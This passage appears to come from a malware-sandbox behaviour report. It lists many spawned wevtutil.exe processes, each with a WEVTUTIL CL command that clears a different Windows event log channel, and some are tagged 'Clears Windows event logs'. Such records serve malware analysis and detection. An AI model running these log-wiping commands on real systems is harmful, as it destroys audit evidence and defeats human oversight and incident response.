WEVTUTIL CL "Microsoft-Windows-DLNA-Namespace/Analytic"
2⤵
PID:2120

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DNS-Client/Operational"
2⤵
- Clears Windows event logs
PID:4868

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DSC/Admin"
2⤵
PID:2656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DSC/Analytic"
2⤵
- Clears Windows event logs
PID:3344

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DSC/Debug"
2⤵
PID:2824

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DSC/Operational"
2⤵
PID:5044

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DUI/Diagnostic"
2⤵
PID:1928

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DUSER/Diagnostic"
2⤵
PID:4924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DXGI/Analytic"
2⤵
PID:384

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DXGI/Logging"
2⤵
PID:1496

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DXP/Analytic"
2⤵
PID:1068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Data-Pdf/Debug"
2⤵
PID:3760

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/Admin"
2⤵
PID:4372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
2⤵
PID:3380

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Analytic"
2⤵
PID:2600

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Debug"
2⤵
PID:3372

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DateTimeControlPanel/Operational"
2⤵
- Clears Windows event logs
PID:1156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Deduplication/Diagnostic"
2⤵
PID:1564

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Deduplication/Operational"
2⤵
PID:3568

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Deduplication/Performance"
2⤵
PID:908

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Deduplication/Scrubbing"
2⤵
PID:1672

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Defrag-Core/Debug"
2⤵
PID:1692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Deplorch/Analytic"
2⤵
PID:3424

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
2⤵
- Clears Windows event logs
PID:2184

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
2⤵
PID:4248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceAssociationService/Performance"
2⤵
PID:1112

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceConfidence/Analytic"
2⤵
PID:2444

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceGuard/Operational"
2⤵
PID:272

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceGuard/Verbose"
2⤵
PID:3736

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
2⤵
PID:3712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
2⤵
PID:2632

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"
2⤵
PID:712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Admin"
2⤵
PID:2660

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Analytic"
2⤵
PID:1248

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Debug"
2⤵
PID:1636

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSetupManager/Operational"
2⤵
PID:2076

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSync/Analytic"
2⤵
PID:692

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceSync/Operational"
2⤵
PID:4604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceUpdateAgent/Operational"
2⤵
PID:4932

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceUx/Informational"
2⤵
PID:4084

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DeviceUx/Performance"
2⤵
PID:3764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Devices-Background/Operational"
2⤵
PID:1616

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Admin"
2⤵
PID:1784

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcp-Client/Operational"
2⤵
PID:2792

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Admin"
2⤵
PID:2932

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dhcpv6-Client/Operational"
2⤵
- Clears Windows event logs
PID:4312

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiagCpl/Debug"
2⤵
PID:284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
2⤵
PID:4428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Analytic"
2⤵
- Clears Windows event logs
PID:3932

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Debug"
2⤵
PID:3748

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-DPS/Operational"
2⤵
PID:2992

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-MSDE/Debug"
2⤵
PID:3756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Analytic"
2⤵
PID:2056

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Debug"
2⤵
PID:3140

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PCW/Operational"
2⤵
PID:276

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Debug"
2⤵
PID:4308

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-PLA/Operational"
2⤵
PID:672

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
2⤵
PID:3068

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scheduled/Operational"
2⤵
- Clears Windows event logs
PID:4640

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Admin"
2⤵
PID:3812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Analytic"
2⤵
PID:2664

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Debug"
2⤵
PID:376

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-Scripted/Operational"
2⤵
PID:3284

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
2⤵
PID:2496

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
2⤵
PID:1948

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDC/Analytic"
2⤵
PID:4696

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnosis-WDI/Debug"
2⤵
PID:320

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Debug"
2⤵
PID:832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Networking/Operational"
2⤵
PID:864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
2⤵
PID:468

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
2⤵
PID:1900

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
2⤵
PID:4956

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
2⤵
PID:2560

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Diagnostics-Performance/Operational"
2⤵
PID:2924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D10/Analytic"
2⤵
PID:4484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D10_1/Analytic"
2⤵
PID:2352

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D11/Analytic"
2⤵
PID:3632

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D11/Logging"
2⤵
PID:4340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D11/PerfTiming"
2⤵
PID:1500

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D12/Analytic"
2⤵
PID:2720

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D12/Logging"
2⤵
PID:2656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D12/PerfTiming"
2⤵
PID:4508

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3D9/Analytic"
2⤵
PID:2628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Direct3DShaderCache/Default"
2⤵
PID:396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectComposition/Diagnostic"
2⤵
PID:4624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectManipulation/Diagnostic"
2⤵
PID:4532

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectShow-KernelSupport/Performance"
2⤵
PID:4412

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DirectSound/Debug"
2⤵
PID:3260

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Disk/Operational"
2⤵
PID:2752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiskDiagnostic/Operational"
2⤵
PID:1820

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
2⤵
PID:2856

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DiskDiagnosticResolver/Operational"
2⤵
PID:860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dism-Api/Analytic"
2⤵
PID:2812

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dism-Api/ExternalAnalytic"
2⤵
- Clears Windows event logs
PID:4756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dism-Api/InternalAnalytic"
2⤵
PID:4848

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dism-Cli/Analytic"
2⤵
PID:3324

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Debug"
2⤵
PID:3156

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DisplayColorCalibration/Operational"
2⤵
PID:4840

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DisplaySwitch/Diagnostic"
2⤵
PID:4600

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Documents/Performance"
2⤵
PID:1352

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dot3MM/Diagnostic"
2⤵
PID:2212

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
2⤵
PID:3652

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DucUpdateAgent/Operational"
2⤵
PID:4024

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dwm-API/Diagnostic"
2⤵
PID:772

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dwm-Core/Diagnostic"
2⤵
PID:2596

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dwm-Dwm/Diagnostic"
2⤵
PID:1700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dwm-Redir/Diagnostic"
2⤵
PID:2872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Dwm-Udwm/Diagnostic"
2⤵
PID:4588

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl-Admin"
2⤵
PID:1244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl-Operational"
2⤵
PID:2904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Contention"
2⤵
- Clears Windows event logs
PID:2020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Diagnostic"
2⤵
PID:4972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Performance"
2⤵
PID:2172

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxgKrnl/Power"
2⤵
PID:3428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
2⤵
PID:2972

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EDP-Application-Learning/Admin"
2⤵
PID:1296

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EDP-Audit-Regular/Admin"
2⤵
PID:1340

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EDP-Audit-TCB/Admin"
2⤵
PID:4988

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EFS/Debug"
2⤵
PID:1476

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ESE/IODiagnose"
2⤵
PID:440

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-ESE/Operational"
2⤵
PID:436

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapHost/Analytic"
2⤵
PID:5032

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapHost/Debug"
2⤵
PID:3004

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapHost/Operational"
2⤵
PID:4064

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapMethods-RasChap/Operational"
2⤵
PID:3328

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapMethods-RasTls/Operational"
2⤵
PID:1152

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapMethods-Sim/Operational"
2⤵
PID:4160

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EapMethods-Ttls/Operational"
2⤵
PID:5036

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EaseOfAccess/Diagnostic"
2⤵
PID:2604

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/EventLog"
2⤵
PID:2228

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Energy-Estimation-Engine/Trace"
2⤵
PID:1648

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"
2⤵
PID:4912

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventCollector/Debug"
2⤵
PID:4516

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventCollector/Operational"
2⤵
PID:288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventLog-WMIProvider/Debug"
2⤵
PID:280

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventLog/Analytic"
2⤵
PID:3832

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-EventLog/Debug"
2⤵
PID:1956

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FMS/Analytic"
2⤵
PID:432

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FMS/Debug"
2⤵
PID:3164

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FMS/Operational"
2⤵
PID:4244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
2⤵
PID:5028

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
2⤵
PID:4896

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Analytic"
2⤵
PID:1904

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FeatureConfiguration/Operational"
2⤵
PID:2764

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Analytic"
2⤵
PID:292

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Catalog/Debug"
2⤵
PID:1656

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Analytic"
2⤵
PID:3860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-ConfigManager/Debug"
2⤵
PID:4148

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Analytic"
2⤵
PID:4932

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/Debug"
2⤵
PID:2188

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Core/WHC"
2⤵
PID:628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Analytic"
2⤵
PID:3864

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/BackupLog"
2⤵
PID:4040

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Engine/Debug"
2⤵
PID:4556

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Analytic"
2⤵
PID:2756

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-EventListener/Debug"
2⤵
PID:2240

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Analytic"
2⤵
PID:4880

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-Service/Debug"
2⤵
PID:2876

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Analytic"
2⤵
PID:4944

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileHistory-UI-Events/Debug"
2⤵
PID:2104

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-FileInfoMinifilter/Operational"
2⤵
PID:1568

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Firewall-CPL/Diagnostic"
2⤵
PID:2192

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Folder Redirection/Operational"
2⤵
PID:3244

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Forwarding/Debug"
2⤵
PID:4940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Forwarding/Operational"
2⤵
PID:4288

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-GPIO-ClassExtension/Analytic"
2⤵
PID:1704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-GenericRoaming/Admin"
2⤵
PID:752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-GroupPolicy/Operational"
2⤵
PID:4888

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HAL/Debug"
2⤵
PID:3752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HealthCenter/Debug"
2⤵
PID:388

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HealthCenter/Performance"
2⤵
PID:552

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HealthCenterCPL/Performance"
2⤵
- Clears Windows event logs
PID:936

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HelloForBusiness/Operational"
2⤵
PID:4776

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Help/Operational"
2⤵
PID:4704

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
2⤵
PID:4460

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Control Panel/Operational"
2⤵
PID:1996

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Listener Service/Operational"
2⤵
- Clears Windows event logs
PID:3572

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
2⤵
PID:1712

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup Provider Service/Operational"
2⤵
PID:3856

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HomeGroup-ListenerService"
2⤵
PID:3796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HotspotAuth/Analytic"
2⤵
PID:1796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HotspotAuth/Operational"
2⤵
PID:2800

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HttpService/Log"
2⤵
PID:4232

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-HttpService/Trace"
2⤵
PID:2336

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"
2⤵
PID:4396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"
2⤵
PID:2860

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"
2⤵
- Clears Windows event logs
PID:3876

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"
2⤵
PID:4452

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"
2⤵
- Clears Windows event logs
PID:4408

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Admin"
2⤵
PID:3780

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"
2⤵
PID:1936

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-Hypervisor-Operational"
2⤵
PID:612

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"
2⤵
PID:2628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Admin"
2⤵
PID:396

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Hyper-V-VID-Analytic"
2⤵
PID:968

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IE-SmartScreen"
2⤵
PID:3188

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IKE/Operational"
2⤵
PID:3940

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IKEDBG/Debug"
2⤵
PID:116

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-Broker/Analytic"
2⤵
PID:1752

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-CandidateUI/Analytic"
2⤵
PID:2696

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"
2⤵
PID:1020

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"
2⤵
PID:3344

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-JPAPI/Analytic"
2⤵
PID:3628

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-JPLMP/Analytic"
2⤵
PID:3580

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-JPPRED/Analytic"
2⤵
PID:1300

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-JPSetting/Analytic"
2⤵
PID:404

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-JPTIP/Analytic"
2⤵
PID:4576

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-KRAPI/Analytic"
2⤵
PID:4828

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-KRTIP/Analytic"
2⤵
PID:2788

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-OEDCompiler/Analytic"
2⤵
PID:2484

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-TCCORE/Analytic"
2⤵
PID:1096

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-TCTIP/Analytic"
2⤵
PID:2804

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IME-TIP/Analytic"
2⤵
PID:772

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IPNAT/Diagnostic"
2⤵
PID:2596

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IPSEC-SRV/Diagnostic"
2⤵
PID:1700

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Debug"
2⤵
PID:2872

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IPxlatCfg/Operational"
2⤵
PID:3888

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IdCtrls/Analytic"
2⤵
PID:4796

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IdCtrls/Operational"
2⤵
PID:3924

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"
2⤵
PID:3500

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Input-HIDCLASS-Analytic"
2⤵
PID:2624

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-InputSwitch/Diagnostic"
2⤵
PID:2172

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
2⤵
PID:3428

C:\Windows\system32\wevtutil.exe
WEVTUTIL CL "Microsoft-Windows-Iphlpsvc/Debug"
2⤵
PID:2972

